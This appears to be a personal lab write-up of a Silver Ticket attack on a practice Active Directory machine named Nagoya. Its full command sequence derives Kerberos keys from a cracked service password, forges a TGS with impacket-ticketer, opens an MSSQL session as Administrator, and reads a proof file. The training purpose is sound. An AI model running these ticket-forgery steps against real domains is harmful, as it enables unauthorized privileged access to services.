InfoSec LAB

Nagoya_Silver_Ticket_Attack

Created: 3 min read

Silver Ticket Attack (TGS Forgery)

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (or AES hash of Kerberos key). Thus, it is possible to gain access to that service by forging a custom TGS as any user. It also must be taken into account that it is possible AND PREFERABLE (OPSEC) to forge tickets using the AES Kerberos keys (AES128 and AES256)

The current context is that the svc_mssql account is a service account for the target MSSQL instance with the SPN set to MSSQL/nagoya.nagoya-industries.com. The account has already been compromised through Kerberoasting earlier, and the target MSSQL instance has been tunneled for ease of access from Kali.

NTLM Hash or Kerberos Key(AES Hash)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ ADKeygen -domain NAGOYA-INDUSTRIES.COM -user svc_mssql -pass Service1           
[*] Salt: NAGOYA-INDUSTRIES.COMsvc_mssql
 
[+] AES256 Key: 24D73DD98EF15BF04ACF5D3FEB6741350D4011268AAC268935BDDE1AD463B05B
[+] AES128 Key: 42EFDE8C2CF59D161003833D776C6DD7
[+] NTLM Hash:  E3A0168BC21CFB88B95C954A5B18F57C

Grabbing the AES256 key

TGS Forgery

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-ticketer gimmeMSSQL -spn MSSQL/nagoya.nagoya-industries.com -domain NAGOYA-INDUSTRIES.COM -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -aesKey 24D73DD98EF15BF04ACF5D3FEB6741350D4011268AAC268935BDDE1AD463B05B
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for NAGOYA-INDUSTRIES.COM/gimmeMSSQL
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in gimmeMSSQL.ccache

Forging a TGS with an arbitrary account, gimmeMSSQL, for the MSSQL/nagoya.nagoya-industries.com SPN Domain name, SID, and AES key of the service account (svc_mssql) were provided to build a TGS

Session

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=gimmeMSSQL.ccache proxychains4 -q impacket-mssqlclient NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com -no-pass -k -dc-ip $IP -target-ip $IP     
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (NAGOYA-IND\Administrator  dbo@master)> 
SQL (NAGOYA-IND\Administrator  dbo@master)> SELECT system_user;
                           
------------------------   
NAGOYA-IND\Administrator   
 
SQL (NAGOYA-IND\Administrator  dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:\\Users\\Administrator\\Desktop\\proof.txt', SINGLE_CLOB) AS Contents
BulkColumn                                
---------------------------------------   
b'224645acd3f84be05453c4d48fa35089\r\n'

Using the forged TGS, session established as the administator user; dbo It’s likely that the target MSSQL is running as the svc_mssql account, given the home directory is present Moving on to the Lateral Movement phase

Alternative

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ proxychains4 -q impacket-mssqlclient NAGOYA-INDUSTRIES.COM/svc_mssql@nagoya.nagoya-industries.com -dc-ip $IP -target-ip $IP -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Service1
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (NAGOYA-IND\svc_mssql  guest@master)>

or skip the silver ticket attack all together and just auth as the svc_mssql account with the -windows-auth flag

Interactive Graph View

Backlinks